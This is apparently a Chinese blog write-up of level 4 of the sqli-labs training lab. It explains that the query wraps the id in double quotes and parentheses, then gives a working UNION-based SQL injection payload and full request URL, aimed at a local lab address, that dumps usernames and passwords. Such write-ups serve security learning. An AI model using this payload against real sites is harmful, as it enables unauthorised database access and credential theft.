sqli-labs系列——第四关

文章目录

      • 判断注入
      • 开始注入

判断注入

第四关过滤了 ’ 但是没有过滤 " ,这个题跟第三题一样,之不过第三题过滤了 " 第四题过滤了 ’ 罢了。

看一下对比:

第三关
sqli-labs系列——第四关_第1张图片

第四关
sqli-labs系列——第四关_第2张图片

也就是说,第四关的sql语句是这样的:

select * from user where id=("$id");

那么exp也很好写了:

-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23

执行的sql语句就是:

select * from user where id=("-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23");

开始注入

http://192.168.1.113:86/Less-4/?id=-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23

sqli-labs系列——第四关_第3张图片

你可能感兴趣的:(sqli-labs)